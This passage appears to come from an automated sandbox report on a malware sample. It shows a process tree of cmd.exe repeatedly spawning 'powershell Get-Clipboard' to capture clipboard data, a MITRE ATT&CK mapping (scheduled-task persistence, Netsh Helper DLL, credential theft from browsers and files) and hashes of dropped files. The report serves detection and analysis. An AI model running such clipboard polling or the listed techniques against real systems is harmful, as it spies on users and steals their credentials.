-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:10068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:9196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4588
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:8256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:6872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:1232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:6044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6772 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:10848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:9708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:5984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:8628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:9632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:1364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:8780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:7784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:8284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:10872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:4056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:7056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:9228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:10900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:9084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:6828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:4348
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD58d460ce715a00afd56cda62e926b8b17
SHA13aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA5121b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
1KB
MD58a9864a3108410099b617e1548085eff
SHA1e86bfaf23a6c5aa554ef32f199530622b04197b0
SHA256db02f0618e9848668aab773d6e465cbd2dcd92c705942995dc73cef90b0941fa
SHA512c79cd815dad61ca4ebd1856fb76c286d7c54ad81c6988d408801650f03bd490b0da10ba8ca00f476854da0be341330f46235477e59ad7a0c0099f6b9c5d50939
-
Filesize
1KB
MD592382908106bf04aac6575ae0e55073f
SHA1b164dd606b60ada42fe843963f95e14e92d5d86a
SHA2561332dc373efa610424b48ae9955247275f4f94cfeecec93a5121784ed8d6b3db
SHA512d6ee3e3776f683b2a4eaf4fd92e2cd2b9412d85fb57556130d8cabf52e180fb17b5dcdfec9ccd0b3b80bed2816c0bd2d25de35580b859e7799b7cb61071edb3f
-
Filesize
64B
MD5894afb4ff3cd7ee1f69400e936f8fc9d
SHA1aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
SHA25620948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
SHA512449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
3KB
MD55b8d1d89c8465c4470051fae3404cdc6
SHA13e04f25656d33f7044a41f04de3b824a5f7d5dc2
SHA2569c593cdb97fc28247bbeef8ad7f19a357a01dd76b4b1375022a0d04e9292e8f7
SHA5121fc4a2ba2ca230daf2b493a7730fe7047a88308b1ba7c764ac01f103076b32a4f165d1aa0de887be9f567bb332b75e1c1909fa8c8668f898e6ca0cd0bb0ba0bb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
728B
MD57b08ba3ef09098492b76babd5df7a9ea
SHA1a6efb81b940d46990ed32b24871953cdddc8c23d
SHA256a32357c19d6ddb59113407b1dbd486eb844f64b542262442ccfc931960a1641d
SHA5124edbdaf506ac6d8767650a343208c940d83a23fe447e79e3a9a41b4180676de345372b63f0c2e56a415a3531801f2236e529079becb98f02ccc79fc813340129
-
Filesize
153KB
MD5f6e0ec36b6cc7188175591c15444cb67
SHA122f6cba40525a6e515ff48725a993e1235a5913f
SHA256d1a3694ee1c234d353976d23733d4767dae4cb2248b72c2fed8959191f922c05
SHA512d0c5e910f07ebbdfdb5fca5a3dcff21b9d14574624cd63926666a41d5b0edda7ce280f3c39b0bf33602cddcbab65beed0a415d745654dc671418691ea383fd48
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
300B
MD5ea1a0b9f3f13f08b3ed9d4a30d5512d1
SHA1960da1a46b8fa0d038fd086b1e9993a56a138c99
SHA256ec71333d12534941d4230676b1a39629d9b7d47fdd3671f1d17ed6a9fdbc38f4
SHA512b3ebac57093e7eef2a488c8a9602799aca0264ee61696413fb5c6dc44d93a1189c4425bd26592547c8c0c5680c86303aa6bb1c8ff2441f312cfc75e189af47e0
-
Filesize
59B
MD52800881c775077e1c4b6e06bf4676de4
SHA12873631068c8b3b9495638c865915be822442c8b
SHA256226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b